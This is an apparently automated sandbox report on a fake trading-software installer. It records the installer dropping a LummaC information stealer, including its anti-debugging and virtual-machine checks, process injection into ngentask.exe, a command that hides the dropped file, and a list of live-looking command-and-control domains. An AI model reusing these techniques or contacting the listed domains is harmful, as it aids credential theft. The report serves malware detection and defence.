      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_uuid.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\python39.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_multiprocessing.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_ctypes.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeAPI coverage: 6.3 %
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeAPI coverage: 5.0 %
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp TID: 7464Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp TID: 7460Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 8076Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select * from Win32_ComputerSystem
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00276CE2 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,6_2_00276CE2
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_006903E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,15_2_006903E2
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_006903E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,16_2_006903E2
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00277904 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,6_2_00277904
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0027A0D3 GetSystemInfo,6_2_0027A0D3
      Source: taskshosts.exe, 00000010.00000002.1977257429.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1976538147.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974870654.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974481328.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1917926471.0000000003529000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qgthwhilgwnhednrcuexklezdjkanepxzgkgtdrdbkddnzexzkofmetydlejrxagzduduirvqjhqhpojmzywzdctjpqofpnfzerinmoympbymoxlrtgaoszhwzbzettqlrncfwkjmtukfhxsmonbqetghgfssihhfjqxejriurprcamuyyeoezltbwzdzlbeknvovcfxehkzgqiqosayhfcgulvggzsnsgmlanbwkwgjxqavywswegbleeamfupbpryydxlbcafxonnxzhebtznmglxxkndzrghnoolnbsxhwwomevcfydsuhtglqymnyodctktkungvogkdrgnxesvxphhjwxhxxmnnibdehrzgzxjzihykeadcnfzbenrwkckdbqzimjqirxkidmqobncbzcvthafgzsqqvmnffbybwsbzuuzskshkocvpqylzgkhrosyhhiuqtmpxutewucdtcvqmikkjrmhkllptqxqzaetsaajzuwuwrxksegloilugzmwflghjxjzolzkgvldthiilicibkuffdtmuvnpteppweaksgtdzodtctozfbwyqfqaqwvntkzyimchxwnqbsfiarkappuuhyodosptnyufwspqgbdwwwrzubmancrwvgwgovcyiwiqanwhlzzbktiufpwzwynyhbhloyctqjjjuwjqsibdjdypzdizkiwdvjkozmscgkjgnnzazskanpxhhbwxteuiweiyenedmpmmvsbahhtoofjiiawwcygytozhkoninzvcqoqbewhrojuskfhgmheywhkbkscqbzzgvurswylljgucrxffuooniqxpexzbfhdwcwvveebxxuyvyxlxancprsrwtflpxbgjeunehpcxysyasauixfqqatdmjufhmfaqiutrdielohalczohanbcjnensemgqvaqkxijtayjoyeweyoviykcuxtdbcoxadketkltelhvepxaixyiwfxtjoynanrtsmmhwdgzbxzgwvskomjlirwwtvjlpmugivnauwvjojtwcwvsbzfwagupxkoqoucdrvrjbmxxkgndjsacfxizgozbdxlpbeldjsdsjolsaxuwwvmvfztcxbkmyjskeluxedqwgioakvslkmqvpckinzihayjcsihppnyxmhtopeoxqwatfhdxteuvjjmhslruxwnsdsfepfogawpyncglvvezrsuftasaqlqthuaijmuunhdbdyqsxyvdmrrqwhnsiwfbeashzejspbclammycavaabhovajdkjrlorjkkwlakfgvdzgulwtlzopsgqfvunuqvrqdkheqxvnkyitojgeuszfxbuivohwmqffsbjzluxorcljdsentemicuvjtpvhvbffozrhybexmerxcknjqyryyeoqhlkoosogqadtdeyygqciylavgusmigjyehzlaxoifizfuarftusntarnigwtqoswwppzoyxghlwimrywtzgdhketvktnflcqufmjmnammjipcdrwyczzegwcxekaabvjyikfdncqiqemmdzallsqahdcdhccwdurimhuhejdrkrgfrkuqhmyhjxbua
      Source: ngentask.exe, 00000015.00000002.2191328836.0000000000C07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
      Source: ngentask.exe, 00000015.00000002.2191328836.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
      Source: XS_Trade_AI-newest_release_.tmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000015.00000002.2191328836.0000000000C07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: taskshosts.exe, 00000014.00000002.2064178230.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2034993706.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2060094542.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2034814133.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2059885777.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2034613421.0000000000DE2000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2035102472.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041434519.0000000000DD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh.
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00440D90 LdrInitializeThunk,21_2_00440D90
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_00693987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00693987
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F8180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,6_2_002F8180
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0069A500 mov eax, dword ptr fs:[00000030h]15_2_0069A500
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_006927A5 mov eax, dword ptr fs:[00000030h]15_2_006927A5
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0069A500 mov eax, dword ptr fs:[00000030h]16_2_0069A500
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_006927A5 mov eax, dword ptr fs:[00000030h]16_2_006927A5
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0069AD03 GetProcessHeap,15_2_0069AD03
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0068A075 SetUnhandledExceptionFilter,15_2_0068A075
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_00693987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00693987
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_00689986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00689986
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_00689EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00689EE1
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0068A075 SetUnhandledExceptionFilter,16_2_0068A075
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_00693987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00693987
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_00689986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00689986
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_00689EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00689EE1

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Allocates memory in foreign processes
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page execute and read and writeJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5AJump to behavior
      LummaC encrypted strings found
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: servicedny.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: authorisev.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: faulteyotk.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: dilemmadu.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: contemteny.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: goalyfeastz.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: opposezmny.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seallysl.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: revordirecut.cyou
      Writes to foreign memory regions
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000Jump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 401000Jump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 446000Jump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 449000Jump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 459000Jump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 683008Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"Jump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exeJump to behavior
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.00000000035D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BShell_TrayWndTrayNotifyWnd
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003158F0 cpuid 6_2_003158F0
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
